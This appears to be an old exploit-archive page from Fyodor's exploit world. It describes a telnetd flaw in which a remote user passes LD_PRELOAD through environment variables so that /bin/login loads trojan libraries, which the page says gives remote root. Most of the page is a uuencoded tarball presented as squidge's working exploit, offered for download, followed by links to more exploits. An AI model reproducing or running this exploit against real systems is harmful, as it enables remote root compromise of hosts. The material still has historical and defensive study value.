Telnetd Environmental variable passing problem

Summary
Description:A "feature" of most telnetd programs is that they will pass environmental variables (like TERM, DISPLAY, etc) for you. Unfortunately this can be a problem if someone passes LD_PRELOAD and causes /bin/login to load trojan libraries!
Author:Well known, squidge (squidge@onyx.infonexus.com) wrote this, but I doubt you can reach him. Isn't he in jail now?
Compromise:root REMOTELY!
Vulnerable Systems:Older Linux boxes, I think SunOS systems, probably others.
Date:January 1996 maybe? Quite old but lives forever like phf.
Notes:Appended is a uuencoded version of squidge's telnetd_ex.tar.gz
Details

begin 600 telnetd_ex.tar.gz
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
MT%F-3@DFBB`I%7K=Z!=,%"4(<#?$%-33H4-1*+P%T6X*E"R>8.3)/[Z9Y6)
MT`J'1[2Y('ZK/+06O$L)9IL2-S(`,$V'4OXH1F,#_>Y!3"^H:9M6%N7!JSR'
M&C/B54$`I+X;TDT%]B_;MH"1Q#:71+2E+:@=IQ03^!I)"VX<A0.OL"TI'CU&
M\?E%M-6VIZHE8]I)<)E)9K<;(\BD"$^A<+N0F7V]`OB%<NZ>%M`;!NF"A;VF
M94GP:PSY8&L8-Z47(%V\_;Y/5K;A:R]]H'8G#Z;P)P"YWPY[HRXG$HS#32^=
MPQH#CU4B!>'B@`VI\##,\F?.6^.ET2$>@!3X!#=BN8/I$IF'6IRJ-=2U,_!V
M#1`NDP*I%,RW87A^`_(C$V@E"NN"O!^?'DLC:?!I94E;%W6&R1!SLJ8BH(SW
ME1Z\?W=\>3(<\3?SE[2B-R_GN(OR.BS)TMQ@^2>\"DX`'[V^^,`7%_S=Y<7B
M]&1QQ/R$/=HF:GOK=`H#QS4HV2-JRH\CCX.:C6[%"O9J.%5KRY5::_P582]]
M0RHSH:J2?)"UIMI.Z\1`572YK9;`-WQ%\M`EG'ZB*1"L$.5-NH1`WZC"'[5B
M`O>&;)'7QK%H)ZQ8S3:P[&!.H63L&8NX%BJC>N0)H,&UQ1_0E/Y7F`J!ZM=G
M;X_/S[\[0L@J$$7#C+0P.$!?@9S;!WLU_ZF"@N'Q.AV`L4]V>N\Y$_NY-NN@
>.^;$O8:H:L@^4_SWV`%]O!ZO_]_KOTJQ..``-```
`
end

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: